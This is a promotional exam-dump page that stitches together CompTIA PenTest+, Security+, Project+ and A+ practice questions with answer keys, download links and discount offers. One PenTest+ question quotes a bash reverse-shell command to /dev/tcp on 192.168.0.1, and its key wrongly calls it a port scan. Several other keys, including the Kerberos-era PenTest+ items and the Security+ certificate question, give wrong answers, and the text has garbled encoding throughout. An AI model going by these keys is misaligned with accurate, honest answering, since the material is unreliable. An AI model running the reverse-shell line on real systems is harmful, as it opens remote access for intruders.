Latest CompTIA PT0-001 dumps make it easy for you to prepare for exams

How can I prepare for CompTIA PenTest+ PT0-001 exam well? Passexamleader shares the latest and effective CompTIA PT0-001 exam questions and answers, online practice tests, and the most authoritative CompTIA exam experts update PT0-001 exam questions throughout the year. Get the full PT0-001 exam dumps selection: https://www.lead4pass.com/pt0-001.html (145 Q&As). Pass the exam with ease!

CompTIA PenTest+ PT0-001 Exam Video

Table of Contents:

Latest CompTIA PT0-001 google drive

[PDF] Free CompTIA PT0-001 pdf dumps download from Google Drive: https://drive.google.com/open?id=174AtllRzbI_c3ioXliaweHmevjoTd2oT

PenTest+ (Plus) Certification | CompTIA IT Certifications:https://www.comptia.org/certifications/pentest

About the exam

  • CompTIA PenTest+ assesses the most up-to-date penetration testing, and vulnerability assessment and management skills necessary to determine the resiliency of the network against attacks.
  • Successful candidates will have the intermediate skills required to customize assessment frameworks to effectively collaborate on and report findings.
  • Candidates will also have the best practices to communicate recommended strategies to improve the overall state of IT security.

Latest updates CompTIA PT0-001 exam practice questions

QUESTION 1
A penetration tester wants to target NETBIOS name service. Which of the following is the most likely command to
exploit the NETBIOS name service?
A. arPspoof
B. nmap
C. responder
D. burpsuite
Correct Answer: C

QUESTION 2
A penetration tester identifies the following findings during an external vulnerability scan:lead4pass PT0-001 exam question q2

Which of the following attack strategies should be prioritized from the scan results above?
A. Obsolete software may contain exploitable components
B. Weak password management practices may be employed
C. Cryptographically weak protocols may be intercepted
D. Web server configurations may reveal sensitive information
Correct Answer: C

QUESTION 3
A penetration tester notices that the X-Frame-Optjons header on a web application is not set. Which of the following
would a malicious actor do to exploit this configuration setting?
A. Use path modification to escape the application\\’s framework.
B. Create a frame that overlays the application.
C. Inject a malicious iframe containing JavaScript.
D. Pass an iframe attribute that is malicious.
Correct Answer: C

QUESTION 4
Which of the following BEST explains why it is important to maintain confidentiality of any identified findings when
performing a penetration test?
A. Penetration test findings often contain company intellectual property
B. Penetration test findings could lead to consumer dissatisfaction if made pubic
C. Penetration test findings are legal documents containing privileged information
D. Penetration test findings can assist an attacker in compromising a system
Correct Answer: D

QUESTION 5
In which of the following scenarios would a tester perform a Kerberoasting attack?
A. The tester has compromised a Windows device and dumps the LSA secrets.
B. The tester needs to retrieve the SAM database and crack the password hashes.
C. The tester has compromised a limited-privilege user and needs to target other accounts for lateral movement.
D. The tester has compromised an account and needs to dump hashes and plaintext passwords from the system.
Correct Answer: C

QUESTION 6
A penetration tester has successfully deployed an evil twin and is starting to see some victim traffic. The next step the
penetration tester wants to take is to capture all the victim web traffic unencrypted. Which of the following would BEST
meet this goal?
A. Perform an HTTP downgrade attack.
B. Harvest the user credentials to decrypt traffic.
C. Perform an MITM attack.
D. Implement a CA attack by impersonating trusted CAs.
Correct Answer: A

QUESTION 7
A penetration tester reviews the scan results of a web application. Which of the following vulnerabilities is MOST critical
and should be prioritized for exploitation?
A. Stored XSS
B. Fill path disclosure
C. Expired certificate
D. Clickjacking
Correct Answer: A
References https://www.owasp.org/index.php/Top_10_2010-A2-Cross-Site_Scripting_(XSS)

QUESTION 8
Which of the following types of physical security attacks does a mantrap mitigate-?
A. Lock picking
B. Impersonation
C. Shoulder surfing
D. Tailgating
Correct Answer: D

QUESTION 9
When performing compliance-based assessments, which of the following is the MOST important Key consideration?
A. Additional rate
B. Company policy
C. Impact tolerance
D. Industry type
Correct Answer: D

QUESTION 10
The following line was found in an exploited machine\\’s history file. An attacker ran the following command:
bash -i >and /dev/tcp/192.168.0.1/80 0> and1
Which of the following describes what the command does?
A. Performs a port scan.
B. Grabs the web server\\’s banner.
C. Redirects a TTY to a remote system.
D. Removes error logs for the supplied IP.
Correct Answer: A

QUESTION 11
After gaining initial low-privilege access to a Linux system, a penetration tester identifies an interesting binary in a
user\\’s folder titled “changepass” -sr -xr -x 1 root root 6443 Oct 18 2017 /home/user/changepass Using “strings” to print
ASCII printable characters from changepass, the tester notes the following: $ strings changepass Exit setuid strmp
GLINC _2.0 ENV_PATH %s/changepw malloc strlen Given this information, which of the following is the MOST likely
path of exploitation to achieve root privileges on the machines?
A. Copy changepass to a writable directory and export the ENV_PATH environmental variable to the path of a token-
stealing binary titled changepw. Then run changepass
B. Create a copy of changepass in the same directory, naming it changpw. Export the ENV_PATH environmental
variable to the path “/home/user\\’. Then run changepass
C. Export the ENV_PATH environmental variable to the path of a writable directory that contains a token-stealing binary
title changepw
D. Run changepass within the current directory with sudo after exporting the ENV_PATH environmental variable to the
path of `/usr/local/bin\\’
Correct Answer: D

QUESTION 12
During an internal network penetration test, a tester recovers the NTLM password hash tor a user known to have full
administrator privileges on a number of target systems Efforts to crack the hash and recover the plaintext password
have been unsuccessful Which of the following would be the BEST target for continued exploitation efforts?
A. Operating system Windows 7 Open ports: 23, 161
B. Operating system Windows Server 2016 Open ports: 53, 5900
C. Operating system Windows 8 1 Open ports 445, 3389
D. Operating system Windows 8 Open ports 514, 3389
Correct Answer: C

QUESTION 13
An energy company contracted a security firm to perform a penetration test of a power plant, which employs ICS to
manage power generation and cooling. Which of the following is a consideration unique to such an environment that
must be made by the firm when preparing for the assessment?
A. Selection of the appropriate set of security testing tools
B. Current and load ratings of the ICS components
C. Potential operational and safety hazards
D. Electrical certification of hardware used in the test
Correct Answer: A

Related PT0-001 Popular Exam resources

titlepdf youtube CompTIA lead4pass Lead4Pass Total Questions related CompTIA blog
CompTIA PenTest+ lead4pass PT0-001 dumps pdf lead4pass PT0-001 youtube PenTest+ (Plus) Certification | CompTIA IT Certifications https://www.lead4pass.com/pt0-001.html 145 Q&A Examkraft Comptia pt0-001 exam

Lead4Pass Year-round Discount Code

lead4pass coupon

What are the advantages of Lead4pass?

Lead4pass employs the most authoritative exam specialists from CompTIA, Microsoft, Cisco, Oracle, VMware, etc.
We update exam data throughout the year. Highest pass rate! We have a large user base. We are the industry leader! Choose Lead4Pass to pass the exam with ease!

about lead4pass

Summarize:

It’s not easy to pass the CompTIA PT0-001 exam, but with accurate learning materials and proper practice, you can crack the exam with excellent results. https://www.lead4pass.com/pt0-001.html provides you with the most relevant learning materials that you can use to help you prepare.

Provides a valid CompTIA Security+ sy0-501 exam dumps | 100% Free

PassexamLeader shares online exam exercise questions all year round! CompTIA Security+ sy0-501 exam “CompTIA Security+ Certification Exam” https://www.lead4pass.com/sy0-501.html (600 Q&As) Continue to study and we provide an updated cisco sy0-501 exam practice questions and answers. You can practice the test online!

Table of Contents:

Latest CompTIA Security+ sy0-501 pdf

[PDF] Free CompTIA Security+ sy0-501 pdf dumps download from Google Drive: https://drive.google.com/open?id=1PLYhsw7iyrmCda6RErqkwxpQ0h-n0E_b

CompTIA Security+ Certification – CompTIA IT Certifications: https://certification.comptia.org/certifications/security

CompTIA Security+ SY0-501 Study Guide: https://certification.comptia.org/training/books/security-sy0-501-study-guide

About the exam

CompTIA Security+ is the first security certification IT professionals should earn.
It establishes the core knowledge required of any cybersecurity role and provides a springboard to intermediate-level cybersecurity jobs.
Security+ incorporates best practices in hands-on trouble-shooting to ensure security professionals have practical security problem-solving skills. Cybersecurity professionals with Security+ know how to address security incidents – not just identify them.

The CompTIA Security+ exam will certify the successful candidate has the knowledge and skills required to install and configure systems
to secure applications, networks, and devices; perform threat analysis and respond with appropriate mitigation techniques;
participate in risk mitigation activities; and operate with an awareness of applicable policies, laws, and regulations.
The successful candidate will perform these tasks to support the principles of confidentiality, integrity, and availability.

CompTIA Security+ sy0-501 Exam Practice Questions

QUESTION 1
As part of the SDLC, a third party is hired to perform a penetration test. The third party will have access to the source
code, integration tests, and network diagrams. Which of the following BEST describes the assessment being
performed?
A. Black box
B. Regression
C. White box
D. Fuzzing
Correct Answer: C


QUESTION 2
A botnet has hit a popular website with a massive number of GRE-encapsulated packets to perform a DDoS attack.
News outlets discover a certain type of refrigerator was exploited and used to send outbound packets to the website that
crashed. To which of the following categories does the refrigerator belong?
A. SoC
B. ICS
C. IoT
D. MFD
Correct Answer: C


QUESTION 3
An organization\\’s internal auditor discovers that large sums of money have recently been paid to a vendor that
management does not recognize. The IT security department is asked to investigate the organizations the
organization\\’s ERP system to determine how the accounts payable module has been used to make these vendor
payments. The IT security department finds the following security configuration for the accounts payable module: New
Vendor Entry ?Required Role: Accounts Payable Clerk New Vendor Approval ?Required Role: Accounts Payable Clerk
Vendor Payment Entry ?Required Role: Accounts Payable Clerk Vendor Payment Approval ?Required Role: Accounts
Payable Manager Which of the following changes to the security configuration of the accounts payable module would
BEST mitigate the risk?lead4pass sy0-501 exam question q3

A. Option A
B. Option B
C. Option C
D. Option D
Correct Answer: A

 

QUESTION 4
A security administrator is trying to encrypt communication. For which of the following reasons should administrator take
advantage of the Subject Alternative Name (SAM) attribute of a certificate?
A. It can protect multiple domains
B. It provides extended site validation
C. It does not require a trusted certificate authority
D. It protects unlimited subdomains
Correct Answer: B


QUESTION 5
New magnetic locks were ordered for an entire building. In accordance with company policy, employee safety is the top
priority.
In case of a fire where electricity is cut, which of the following should be taken into consideration when installing the new
locks?
A. Fail safe
B. Fault tolerance
C. Fail secure
D. Redundancy
Correct Answer: A

 

QUESTION 6
Which of the following would be MOST effective in reducing tailgating incidents?
A. Mantrap
B. Faraday cage
C. Motion detection
D. Bollards
Correct Answer: A


QUESTION 7
A senior incident response manager receives a call about some external IPs communicating with internal computers
during off hours. Which of the following types of malware is MOST likely causing this issue?
A. Botnet
B. Ransomware
C. Polymorphic malware
D. Armored virus
Correct Answer: A


QUESTION 8
A chief Financial Officer (CFO) has asked the Chief Information Officer (CISO) to provide responses to a recent audit
report detailing deficiencies in the organization security controls. The CFO would like to know ways in which the
organization can improve its authorization controls.
Given the request by the CFO, which of the following controls should the CISO focus on in the report? (Select Three)
A. Password complexity policies
B. Hardware tokens
C. Biometric systems
D. Role-based permissions
E. One time passwords
F. Separation of duties
G. Multifactor authentication
H. Single sign-on
I. Lease privilege
Correct Answer: DFI

 

QUESTION 9
An administrator has configured a new Linux server with the FTP service. Upon verifying that the service was configured
correctly, the administrator has several users test the FTP service. Users report that they are able to connect to the FTP
service and download their personal files, however, they cannot transfer new files to the server.
Which of the following will most likely fix the uploading issue for the users?
A. Create an ACL to allow the FTP service write access to user directories
B. Set the Boolean selinux value to allow FTP home directory uploads
C. Reconfigure the ftp daemon to operate without utilizing the PSAV mode
D. Configure the FTP daemon to utilize PAM authentication pass through user permissions
Correct Answer: A

 

QUESTION 10
Joe notices there are several user accounts on the local network generating spam with embedded malicious code.
Which of the following technical control should Joe put in place to BEST reduce these incidents?
A. Account lockout
B. Group Based Privileges
C. Least privilege
D. Password complexity
Correct Answer: A

 

QUESTION 11
A product manager is concerned about continuing operations at a facility located in a region undergoing significant
political unrest. After consulting with senior management, a decision is made to suspend operations at the facility until
the situation stabilizes.
Which of the following risk management strategies BEST describes management\\’s response?
A. Deterrence
B. Mitigation
C. Avoidance
D. Acceptance
Correct Answer: C

 

QUESTION 12
A group of non-profit agencies wants to implement a cloud service to share resources with each other and minimize
costs. Which of the following cloud deployment models BEST describes this type of effort?
A. Public
B. Hybrid
C. Community
D. Private
Correct Answer: C

 

QUESTION 13
Which of the following is an asymmetric function that generates a new and separate key every time it runs?
A. RSA
B. DSA
C. DHE
D. HMAC
E. PBKDF2
Correct Answer: C

Watch the CompTIA Security+ sy0-501 video tutorial online

We offer more ways to make it easier for everyone to learn, and YouTube is the best tool in the video. Follow channels: https://www.youtube.com/channel/UCXg-xz6fddo6wo1Or9eHdIQ/videos get more useful exam content.

Related sy0-501 Popular Exam resources

titlepdf youtube CompTIA lead4pass Lead4Pass Total Questions
CompTIA Security+ lead4pass sy0-501 dumps pdf lead4pass sy0-501 youtube CompTIA Security+ Certification – CompTIA IT Certifications https://www.lead4pass.com/sy0-501.html 600 Q&A

Get Lead4Pass Coupons(12% OFF)

lead4pass coupon

What are the advantages of Lead4pass?

We have a number of CompTIA, CompTIA, IBM, CompTIA, and other exam experts. We update exam data throughout the year.
Top exam pass rate! We have a large user base. We are an industry leader! Choose Lead4Pass to pass the exam with ease!

why lead4pass

Summarize:

The free CompTIA Security+ sy0-501 exam dumps can help you improve your skills and exam experience! To pass the cisco sy0-501 exam at once: https://www.lead4pass.com/sy0-501.html We make CompTIA sy0-501 videos and sy0-501 pdf for you to learn! I hope you can pass the exam easily.

[Real Exam Dumps] Newest CompTIA Project+ PK0-003 Dumps PDF Files And VCE Youtube Update Demo (Q1-Q30)

Newest helpful CompTIA Project+ PK0-003 dumps pdf files and vce youtube demo update free shared. Latest CompTIA Project+ PK0-003 dumps real exam questions and answers free download from lead4pass. “Project+ (2009)” is the name of CompTIA Project+ https://www.lead4pass.com/pk0-003.html exam dumps which covers all the knowledge points of the real CompTIA exam. The best useful CompTIA Project+ PK0-003 dumps exam training materials in PDF format update free try, pass CompTIA PK0-003 exam test easily at first attempt.

Useful latest CompTIA PK0-003 dumps pdf files free download: https://drive.google.com/open?id=0B_7qiYkH83VRTG5GRTB0U3ZSTm8

Useful latest CompTIA SK0-003 dumps pdf files free download: https://drive.google.com/open?id=0B_7qiYkH83VRYWxPaWhYMXM3dVk
PK0-003 dumps
QUESTION 1
Which of the following aspects of project closure deals with the rating of areas of project progress and participation?
A. Weighted scoring
B. Facility disposition
C. Performance evaluations
D. Supply disposition
Correct Answer: C

QUESTION 2
When creating a communication plan, the project manager should include the escalation path, format and frequency of meetings, and:
A. Roles and responsibilities
B. Risk and issue log
C. Budget
D. Scope
Correct Answer: A

QUESTION 3
A project team is meeting monthly for their project risk review. During the brainstorm, one of the team members mentions that a risk to the project could be a delay with the servers. Which of the following is the BEST response?
A. Exploit
B. Enhance
C. Avoid
D. Share
Correct Answer: C

QUESTION 4
The project manager is reviewing the earned value of work completed compared to the planned value and is representing it in a dollar figure. PK0-003 dumps This type of analysis is an example of which of the following?
A. Cost performance index
B. Risk mitigation
C. Schedule variance
D. Cost variance
Correct Answer: C

QUESTION 5
In which of the following project life cycle phases would one perform the first stakeholder\’s analysis?
A. Initiation
B. Controlling
C. Planning
D. Monitoring
Correct Answer: A

QUESTION 6
A project with a projected budget of $100,000 is 75% complete and has a CPI of .85. Which of the following is TRUE regarding this project?
A. More project work than projected has been completed
B. The project is currently in cost overrun
C. The project EV is 63.75
D. $85,000 has been spent in the project
Correct Answer: B

QUESTION 7
Which of the following is the BEST method to avoid staffing conflict between resource managers and project managers?
A. Allow team members to enter the project as best fits their schedule.
B. Ask the project sponsor for team member assignments.
C. Claim the best department resources before the project starts.
D. Formally request team members early.
Correct Answer: D

QUESTION 8
A project manager is trying to ensure the quality of the design and reduce the number of potential defects. The project manager would like to use the fishbone diagram to perform this analysis. This type of modeling relies on:
A. Prioritizing the specific event.
B. Variance in the process over time.
C. Causes of a specific event.
D. Determining the number of events.
Correct Answer: C

QUESTION 9
Which of the following is included in decision oversight?
A. Local, state, and federal laws
B. Change control board, committee consulting
C. Tollgate approval, project phase transition
D. Audit trails, retention, and version control
Correct Answer: B

QUESTION 10
A chart of accounts is included in which of the following plans?
A. Quality management
B. Cost management
C. Risk management
D. Procurement management
Correct Answer: B

QUESTION 11
Which of the following project plan components would include information regarding the management of issues? PK0-003 dumps
A. Project Management Plan
B. Human Resources Plan
C. Risk Management Plan
D. Scope Management Plan
Correct Answer: A

QUESTION 12
Which of the following represents a good reason for formally closing out a project?
A. To provide historical information for future projects
B. To manage stakeholders\’ expectations
C. To promote team cohesiveness
D. To keep a record in case someone comes back later with an issue after transition
Correct Answer: A

QUESTION 13
When would a project manager have a closure meeting? (Select THREE).
A. Stage completion
B. Task completion
C. Document completion
D. Project cancellation
E. Project completion
F. Vendor cancellation
Correct Answer: ADE

QUESTION 14
Which of the following describes the work package level of a WBS?
A. Project phases
B. Major deliverables
C. The lowest level
D. The project name
Correct Answer: C

QUESTION 15
Which of the following is required to validate a project?
A. Problem statement
B. Signed project charter
C. Key project deliverables
D. Alignment with the organization\’s strategic goals
Correct Answer: D

QUESTION 16
Which of the following components of a project charter include identifying important milestones of the project?
A. Key project deliverables
B. High level assumptions
C. Identify stakeholders
D. High level constraints
Correct Answer: A

QUESTION 17
A project is nearing completion. PK0-003 dumps Which of the following tasks is required to ensure continuity after the project closes?
A. Transition ownership to operational team
B. Extended support delivered by project members
C. Ensure the operation team provides warranty prior to handover
D. Periodic training of project team resources
Correct Answer: A

QUESTION 18
In which of the following project organizations would the project management be handled by a marketing manager?
A. Matrix
B. Balanced
C. Projectized
D. Functional
Correct Answer: D

QUESTION 19
A project manager has inherited a project that is $5 million over budget. Which of the following would the project manager do to help determine the root cause of the budget overrun?
A. Ensure the project plan reflects all tasks were documented during planning
B. Review the change control log
C. Perform qualitative risk analysis
D. Review if the project has maintained alignment with the scope
Correct Answer: D

QUESTION 20
Which of the following statements is considered a project management best practice?
A. Project initiation occurs before project planning begins
B. When execution begins, monitoring and controlling begins
C. Completion of the charter is the first deliverable of project planning
D. Each of the five process groups within the project management life cycle should be completed consecutively
Correct Answer: A

QUESTION 21
A network diagram is used to organize which of the following?
A. Critical path
B. Defects
C. WBS
D. Issues
Correct Answer: A

QUESTION 22
During which of the following process groups is the project charter developed?
A. Pre-project setup
B. Project execution
C. Project planning
D. Project control
Correct Answer: A

QUESTION 23
A project is struggling because additional requirements keep being requested that prevent the team from focusing on the purpose of the project. PK0-003 dumps This could have been avoided by using:
A. Quality metrics
B. A budget
C. A WBS
D. A scope statement
Correct Answer: D

QUESTION 24
An unexpected risk has been identified in a project. Which of the following actions should the project manager perform FIRST?
A. Add the risk to the risk register
B. Update the project probability / impact matrix
C. Submit a change request
D. Perform a risk qualitative analysis
Correct Answer: A

QUESTION 25
Within a corporation, project managers are assigned people based on defined roles and responsibilities. Project resources are temporarily provided to the project but still report the functional managers as well as the project manager.
Which of the following styles of management is this also known as?
A. Projectized management
B. Matrix management
C. Functional management
D. SCRUM / agile
Correct Answer: B

QUESTION 26
A project has been going on for three weeks, and the project manager notices that Resource A is beginning to fall behind schedule. The project manager should FIRST schedule a meeting with:
A. The project stakeholders to communicate the delay.
B. Resource A to confirm estimates.
C. The other team members to make up the schedule slippage.
D. The manager of Resource A for corrective action.
Correct Answer: B

QUESTION 27
Which of the following is typically the LAST step when acquiring a product or service from a vendor?
A. Vendor selection
B. Evaluate seller response
C. Contract development
D. Contract signing
Correct Answer: D

QUESTION 28
A key supplier has informed the project manager that there will be a two month delay to fulfill an order. Which component of the project plan is affected and which of the following actions should be taken?
A. Evaluate the project schedule and raise a project issue.
B. Manage project quality and schedule a meeting.
C. Implement approved changes by utilizing a change management form.
D. Manage scope and consider a project change request.
Correct Answer: A

QUESTION 29
Which of the following may have a significant adverse impact upon the successful completion of an international project? (Select THREE).
A. Time zones
B. Travel costs
C. Co-location of resources
D. The project plan
E. Scheduled vacations
F. Language barriers
Correct Answer: ABF

QUESTION 30
Which of the following are common components of a project transition plan? (Select TWO).
A. Extended support
B. Work performance
C. Ownership identification
D. Risk assessment
E. Budget analysis
Correct Answer: AC

Prepare for CompTIA PK0-003 exam test with useful CompTIA Project+ PK0-003 dumps pdf practice materials and study guides free download from lead4pass. The best and most updated CompTIA Project+ https://www.lead4pass.com/pk0-003.html dumps pdf training resources which are the best for clearing PK0-003 exam test, and to get certified by CompTIA Project+, download one of the many PDF readers that are available for free.

Best CompTIA Project+ PK0-003 dumps vce youtube free demo: https://youtu.be/_jpnpplo5es

[Real Exam Dumps] High Quality CompTIA A+ 220-801 Dumps Exam Questions And Youtube (Q1-Q15)

High quality CompTIA A+ 220-801 dumps exam questions and answers free download from lead4pass. “CompTIA A+ Certification Exam” is the name of CompTIA A+ https://www.lead4pass.com/220-801.html exam dumps which covers all the knowledge points of the real CompTIA exam. The latest useful CompTIA A+ 220-801 dumps vce youtube demo update free shared.

Helpful latest CompTIA A+ 220-801 dumps pdf training resources which are the best for clearing 220-801 exam test, and to get certified by CompTIA A+. The best and most updated useful CompTIA A+ 220-801 dumps pdf training materials free try, pass CompTIA 220-801 exam test easily at first attempt.

The best CompTIA 220-801 dumps pdf questions and answers: https://drive.google.com/open?id=0B_7qiYkH83VRNjNMdThRWnZ5R3M

The best CompTIA 220-802 dumps pdf questions and answers: https://drive.google.com/open?id=0B_7qiYkH83VRa210SXU1dFFTS2M
220-801 dumps
QUESTION 1
Which of the following network devices broadcasts all data to all users?
A. Hub
B. Router
C. Switch
D. Bridge
Correct Answer: A

QUESTION 2
Which of the following cable types has a MAXIMUM transfer speed greater than 1 Gbps?
A. CAT6
B. CAT5
C. CAT5e
D. STP
Correct Answer: A

QUESTION 3
When comparing DSL broadband to cable broadband, which of the following is an advantage of DSL broadband?
A. Upgraded copper lines allow maximum speed greater than cable
B. Signal is not shared back to the switch
C. Signal is shared back to the switch
D. Distance is not a factor in signal speed
Correct Answer: B

QUESTION 4
Which of the following wireless protocols is limited to operating in the 5 GHz range ONLY?
A. 802.11a
B. 802.11b
C. 802.11g
D. 802.11n
Correct Answer: A

QUESTION 5
A user\’s iPhone will not power on. 220-801 dumps Which of the following should the technician do FIRST to isolate the problem?
A. Plug the phone into a known good charger
B. Remove and reseat the battery
C. Replace the screen glass assembly
D. Replace the battery and charge the phone
Correct Answer: A

QUESTION 6
Which of the following laptop displays would provide physical flexibility and transparency?
A. Standard LCD
B. Plasma
C. OLED
D. LED-backlit LCD
Correct Answer: C

QUESTION 7
A user states that the display is not very bright on their laptop. Which of the following is the MOST likely location to adjust the brightness?
A. In the Device Manager of the operating system
B. In the BIOS
C. Fn key
D. In the video display drivers
Correct Answer: C

QUESTION 8
A supervisor has asked a technician to share the multifunction device that is directly connected to a PC. The PC is running Windows XP Professional. Which of the following steps are valid options to allow the technician to complete this task?
A. Type andquot;appwiz.cplandquot; at the run line and install the printer as a shared device.
B. Start andgt;All Programs andgt;Control Panel andgt;Network Connections andgt;Right click on desired printer and go to andquot;Sharingandquot;. Select the option to share the printer and give it a share name.
C. Start andgt;All Programs andgt;Control Panel andgt;Scanners and Cameras andgt;Right click on desired device and go to andquot;Sharingandquot;. Select the option to share the device and give it a share name.
D. Start andgt;All Programs andgt;Control Panel andgt;Printers and Faxes andgt;Right click on desired printer and go to andquot;Sharingandquot;. Select the option to share the printer and give it a share name.
Correct Answer: D

QUESTION 9
Which of the following motherboards would fit in an ATX case?
A. BTX
B. ITX
C. Ultra ATX
D. Micro ATX
Correct Answer: D

QUESTION 10
Which of the following is required during the installation of a digitizer? 220-801 dumps
A. Must be connected to the Internet
B. Must be cleaned
C. Must have the latest software installed
D. Must be calibrated
Correct Answer: D

QUESTION 11
Which of the following devices is MOST likely to outperform a 15,000 rpm SAS hard drive in read speed?
A. Compact flash
B. SSD
C. Tape
D. SD
Correct Answer: B

QUESTION 12
Which of the following is an example of an APIPA address?
A. 4.2.2.2
B. 10.23.145 90
C. 169.254.44.157
D. 192.168.32.59
Correct Answer: C

QUESTION 13
A technician is building a custom gaming computer. Which of the following is the FASTEST memory the technician can use?
A. DDR2 CAS7
B. DDR3 CAS9
C. DDR3 CAS10
D. DDR3 CAS11
Correct Answer: B

QUESTION 14
Which of the following are steps to take before replacing or updating the memory in a laptop? (Select TWO).
A. Unplug the AC power adapter
B. Remove the keyboard and touchpad
C. Separate the screen from the base
D. Remove the battery
E. Remove all of the screws from the bottom of the case
Correct Answer: AD

QUESTION 15
An end user is designing a PC with a clear acrylic access panel to show off the insides. The user wants the inside to stay cool, but as dust free as possible. Which of the following would BEST meet this scenario?
A. Create a positive pressure air flow with unfiltered intakes and filtered exhausts
B. Create a positive pressure air flow with filtered intakes and unfiltered exhausts
C. Create a negative pressure air flow with unfiltered intakes and unfiltered exhausts
D. Create a negative pressure air flow with filtered exhausts and unfiltered exhausts
Correct Answer: B

Latest CompTIA A+ https://www.lead4pass.com/220-801.html dumps pdf practice files and study guides free download from lead4pass. New CompTIA A+ 220-801 dumps exam training resources free update, 100% success and guarantee to pass.

Best useful CompTIA A+ 220-801 dumps vce youtube free demo: https://youtu.be/PXvcbMiJd3g